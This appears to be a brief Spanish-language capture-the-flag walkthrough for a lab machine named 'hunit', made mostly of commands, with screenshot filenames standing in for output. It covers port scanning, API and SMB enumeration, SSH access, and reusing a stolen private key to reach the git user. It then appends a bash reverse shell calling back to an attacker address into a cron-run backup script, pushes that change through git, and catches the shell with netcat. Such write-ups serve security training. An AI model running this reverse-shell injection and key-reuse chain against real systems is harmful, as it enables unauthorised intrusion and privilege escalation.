nmap -A -p- -oA hunit 192.168.123.125 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA hunit 192.168.123.125

nmap -sU -O -p- -oA hunit-udp 192.168.123.125

nikto -h 192.168.123.125:80

Pasted image 20211006115830.png

Pasted image 20211006120206.png

Cuando le damos click a uno de los links podemos ver un comentario como el de abajo.

Pasted image 20211006120129.png

curl http://192.168.123.125:8080/api/

Pasted image 20211006120531.png

curl http://192.168.123.125:8080/api/user

Pasted image 20211006120603.png

smbclient -L 192.168.123.125 -p 12445

Pasted image 20211006120815.png

ssh dademola@192.168.123.125 -p 43022

Pasted image 20211006121040.png

Con linpeas.sh conseguimos lo siguiente:

Pasted image 20211006121136.png

Vemos que esto es un backup

Pasted image 20211006121256.png

Vemos que git es otro usuario regular

Pasted image 20211006121345.png

git clone file:////git-server

Pasted image 20211006123335.png

cd home/git

Pasted image 20211006124518.png

ssh -i id_rsa git@192.168.123.125 -p 43022

Pasted image 20211006125719.png

cd git-server

vim backups.sh

chmod +x backups.sh

echo "sh -i >& /dev/tcp/192.168.49.123/8080 0>&1" >> backups.sh

git add .

git commit -m "reverse"

Pasted image 20211006131146.png

GIT_SSH_COMMAND='ssh -i id_rsa -p 43022' git push origin master

nc -lvnp 8080

Pasted image 20211006132509.png

whoami

Pasted image 20211006134840.png

boxes

copyright©2022 Cu3rv0x all rights reserved